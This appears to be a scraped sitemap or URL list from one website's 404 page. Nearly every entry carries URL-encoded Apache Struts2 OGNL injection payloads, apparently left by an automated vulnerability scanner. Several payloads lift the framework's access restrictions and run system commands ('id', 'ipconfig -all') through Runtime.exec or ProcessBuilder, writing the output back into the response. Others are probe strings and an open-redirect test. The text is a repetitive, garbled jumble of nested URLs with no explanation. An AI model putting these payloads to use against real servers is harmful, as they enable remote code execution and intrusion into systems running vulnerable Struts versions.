0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f=osm16917%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem88519%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=fsm76414%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem87839%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=fsm73586%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem81278%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 